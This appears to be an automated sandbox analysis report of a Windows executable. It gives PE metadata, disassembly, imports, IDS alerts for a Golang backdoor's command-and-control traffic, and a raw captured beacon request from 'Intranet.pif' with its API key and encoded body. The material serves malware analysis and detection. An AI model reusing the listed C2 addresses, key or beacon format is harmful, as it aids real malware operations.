                                                                      SSDEEP:98304:EXuh+Vhzg/8l2Gv5IQDaAsHeuC1QSGvQ5NvAcPIciyfEHWlM/M5r2ROHN8053y/M:anUXnAG9C1QQyyfmWlkMY0Ht9UUN9WdO
                                                                      TLSH:45A799FEB1248E601167C96776B27287A9FBEFE2B46028341CF1D466F484B9D436324D
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n... ...B...8.....
                                                                      Icon Hash:07334dcc0e4d7727
                                                                      Entrypoint:0x403883
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                      Signature Valid:
                                                                      Signature Issuer:
                                                                      Signature Validation Error:
                                                                      Error Number:
                                                                      Not Before, Not After
                                                                        Subject Chain
                                                                          Version:
                                                                          Thumbprint MD5:
                                                                          Thumbprint SHA-1:
                                                                          Thumbprint SHA-256:
                                                                          Serial:
                                                                          Instruction
                                                                          sub esp, 000002D4h
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          xor ebp, ebp
                                                                          pop esi
                                                                          mov dword ptr [esp+18h], ebp
                                                                          mov dword ptr [esp+10h], 00409268h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [00408030h]
                                                                          push 00008001h
                                                                          call dword ptr [004080B4h]
                                                                          push ebp
                                                                          call dword ptr [004082C0h]
                                                                          push 00000008h
                                                                          mov dword ptr [00472EB8h], eax
                                                                          call 00007F0BF0BBF73Bh
                                                                          push ebp
                                                                          push 000002B4h
                                                                          mov dword ptr [00472DD0h], eax
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push eax
                                                                          push ebp
                                                                          push 00409264h
                                                                          call dword ptr [00408184h]
                                                                          push 0040924Ch
                                                                          push 0046ADC0h
                                                                          call 00007F0BF0BBF41Dh
                                                                          call dword ptr [004080B0h]
                                                                          push eax
                                                                          mov edi, 004C30A0h
                                                                          push edi
                                                                          call 00007F0BF0BBF40Bh
                                                                          push ebp
                                                                          call dword ptr [00408134h]
                                                                          cmp word ptr [004C30A0h], 0022h
                                                                          mov dword ptr [00472DD8h], eax
                                                                          mov eax, edi
                                                                          jne 00007F0BF0BBCD0Ah
                                                                          push 00000022h
                                                                          pop esi
                                                                          mov eax, 004C30A2h
                                                                          push esi
                                                                          push eax
                                                                          call 00007F0BF0BBF0E1h
                                                                          push eax
                                                                          call dword ptr [00408260h]
                                                                          mov esi, eax
                                                                          mov dword ptr [esp+1Ch], esi
                                                                          jmp 00007F0BF0BBCD93h
                                                                          push 00000020h
                                                                          pop ebx
                                                                          cmp ax, bx
                                                                          jne 00007F0BF0BBCD0Ah
                                                                          add esi, 02h
                                                                          cmp word ptr [esi], bx
                                                                          Programming Language:
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ C ] VS2010 SP1 build 40219
                                                                          • [RES] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x5d96.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x73f7ec0x28b0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xf40000x5d960x5e00122344e81194ddf4b9ed4509eca74dbdFalse0.9144365026595744data7.710006874828384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0xfa0000xf320x1000f7d174b6068c3ab696909b33c96ce9b9False0.589111328125data5.414096826624046IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xf42380x466fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.987632410847984
                                                                          RT_ICON0xf88a80x967PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0045700041545493
                                                                          RT_ICON0xf92100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5691489361702128
                                                                          RT_DIALOG0xf96780x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0xf97780x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0xf98940x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0xf98f40x30dataEnglishUnited States0.8541666666666666
                                                                          RT_VERSION0xf99240x19cdataEnglishUnited States0.5728155339805825
                                                                          RT_MANIFEST0xf9ac00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                          DLLImport
                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-29T16:25:40.860487+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21109.172.87.13522016192.168.2.649730TCP
                                                                          2024-11-29T16:25:40.862913+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.649730109.172.87.13522016TCP
                                                                          2024-11-29T16:26:09.536154+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.649730109.172.87.13522016TCP
                                                                          2024-11-29T16:26:09.968816+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11109.172.87.13522016192.168.2.649730TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 29, 2024 16:25:07.161292076 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:07.281281948 CET804972046.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:07.281420946 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:07.282548904 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:07.402443886 CET804972046.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:08.631261110 CET804972046.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:08.635113001 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:08.713974953 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:08.755295038 CET804972146.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:08.755599022 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:08.756542921 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:08.876897097 CET804972146.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:10.221267939 CET804972146.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:10.264134884 CET4972280192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:10.304042101 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:10.384134054 CET804972293.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:10.384239912 CET4972280192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:10.456017017 CET4972280192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:10.504416943 CET804972293.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:10.504530907 CET4972280192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:10.576128006 CET804972293.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:10.584574938 CET4972280192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:10.614713907 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:10.624762058 CET804972293.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:10.704494953 CET804972293.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:10.734802008 CET804972391.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:10.734966993 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:10.964260101 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:11.084287882 CET804972391.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:12.139635086 CET804972391.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:12.148022890 CET4972480192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:12.211344957 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:12.267894983 CET8049724188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:12.267998934 CET4972480192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:12.268436909 CET4972480192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:12.388196945 CET8049724188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:12.388262033 CET4972480192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:12.388304949 CET8049724188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:12.388458014 CET4972480192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:12.388541937 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:12.388575077 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:12.388602018 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:12.508172035 CET8049724188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:12.508268118 CET8049724188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:12.508790970 CET804972391.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:12.508863926 CET4972380192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:12.509432077 CET804972146.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:12.509494066 CET4972180192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:12.509500027 CET804972046.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:12.509555101 CET4972080192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:23.472022057 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:23.592310905 CET804972546.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:23.592391014 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:23.677040100 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:23.796933889 CET804972546.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:25.363307953 CET804972546.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:25.374090910 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:25.405657053 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:25.494069099 CET804972646.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:25.494206905 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:25.495266914 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:25.615365982 CET804972646.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:26.907893896 CET804972646.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:26.910415888 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:26.957676888 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:27.030575991 CET804972793.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:27.030925035 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:27.031255007 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:27.151227951 CET804972793.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:33.469351053 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:33.589577913 CET804972546.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:33.589669943 CET4972580192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:35.376174927 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:35.496421099 CET804972646.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:35.496498108 CET4972680192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:36.908153057 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:36.911216974 CET4972880192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:37.031116962 CET804972891.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:37.031269073 CET4972880192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:37.031603098 CET4972880192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:37.071175098 CET804972793.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:37.151401043 CET804972891.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:37.151482105 CET4972880192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:37.151521921 CET804972891.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:37.151555061 CET4972880192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:37.154208899 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:37.271488905 CET804972891.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:37.271500111 CET804972891.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:37.274197102 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:37.274266958 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:37.274530888 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:37.394536972 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:39.397080898 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:39.405654907 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:39.437179089 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:39.526264906 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:39.526385069 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:40.860486984 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:40.862912893 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:40.983014107 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:42.381830931 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.501804113 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:42.501995087 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.503551960 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:42.623575926 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:43.858613968 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:43.872234106 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:43.904400110 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:43.992166042 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:43.992295980 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:43.992676973 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:44.167327881 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:45.635513067 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:45.639333963 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.686866045 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:45.759424925 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:45.760838985 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.761244059 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:45.881117105 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:48.971350908 CET804972793.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:48.971427917 CET4972780192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:52.405086040 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:52.525454998 CET804973146.8.232.106192.168.2.6
                                                                          Nov 29, 2024 16:25:52.525547028 CET4973180192.168.2.646.8.232.106
                                                                          Nov 29, 2024 16:25:53.898447990 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:54.019043922 CET804973246.8.236.61192.168.2.6
                                                                          Nov 29, 2024 16:25:54.019226074 CET4973280192.168.2.646.8.236.61
                                                                          Nov 29, 2024 16:25:55.649162054 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:25:55.651699066 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.771614075 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:55.772785902 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.773204088 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:55.811604977 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:25:55.893740892 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:55.992288113 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:25:56.112390995 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:25:57.154066086 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:57.183129072 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.199827909 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:57.303112030 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.303180933 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.339792967 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423263073 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.423378944 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423445940 CET4973580192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:25:57.423527002 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:25:57.459996939 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543289900 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543322086 CET8049735188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:25:57.543977976 CET804973491.212.166.91192.168.2.6
                                                                          Nov 29, 2024 16:25:57.544078112 CET4973480192.168.2.691.212.166.91
                                                                          Nov 29, 2024 16:26:00.773581028 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:00.773838043 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:26:00.893834114 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:07.691843987 CET804973393.185.159.253192.168.2.6
                                                                          Nov 29, 2024 16:26:07.691910982 CET4973380192.168.2.693.185.159.253
                                                                          Nov 29, 2024 16:26:09.399477959 CET4972980192.168.2.6188.130.206.243
                                                                          Nov 29, 2024 16:26:09.519634008 CET8049729188.130.206.243192.168.2.6
                                                                          Nov 29, 2024 16:26:09.536154032 CET4973022016192.168.2.6109.172.87.135
                                                                          Nov 29, 2024 16:26:09.656178951 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:09.968816042 CET2201649730109.172.87.135192.168.2.6
                                                                          Nov 29, 2024 16:26:10.014019012 CET4973022016192.168.2.6109.172.87.135
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 29, 2024 16:24:11.989084005 CET5556253192.168.2.61.1.1.1
                                                                          Nov 29, 2024 16:24:12.224910021 CET53555621.1.1.1192.168.2.6
                                                                          Nov 29, 2024 16:24:26.963452101 CET5952453192.168.2.61.1.1.1
                                                                          Nov 29, 2024 16:24:27.105022907 CET53595241.1.1.1192.168.2.6
                                                                          Nov 29, 2024 16:24:40.641777992 CET5223853192.168.2.61.1.1.1
                                                                          Nov 29, 2024 16:24:40.779093027 CET53522381.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 29, 2024 16:24:11.989084005 CET192.168.2.61.1.1.10xf725Standard query (0)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUiA (IP address)IN (0x0001)false
                                                                          Nov 29, 2024 16:24:26.963452101 CET192.168.2.61.1.1.10xf4aeStandard query (0)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUiA (IP address)IN (0x0001)false
                                                                          Nov 29, 2024 16:24:40.641777992 CET192.168.2.61.1.1.10x52a8Standard query (0)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUiA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 29, 2024 16:24:12.224910021 CET1.1.1.1192.168.2.60xf725Name error (3)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUinonenoneA (IP address)IN (0x0001)false
                                                                          Nov 29, 2024 16:24:27.105022907 CET1.1.1.1192.168.2.60xf4aeName error (3)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUinonenoneA (IP address)IN (0x0001)false
                                                                          Nov 29, 2024 16:24:40.779093027 CET1.1.1.1192.168.2.60x52a8Name error (3)qvlUfqsrAwswxcUi.qvlUfqsrAwswxcUinonenoneA (IP address)IN (0x0001)false
                                                                          • 46.8.232.106
                                                                          • 46.8.236.61
                                                                          • 93.185.159.253
                                                                          • 91.212.166.91
                                                                          • 188.130.206.243
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.64972046.8.232.106801292C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 29, 2024 16:25:07.282548904 CET298OUTPOST / HTTP/1.1
                                                                          Host: 46.8.232.106
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: GBhb1vep
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:08.631261110 CET183INHTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:08 GMT
                                                                          Content-Length: 18
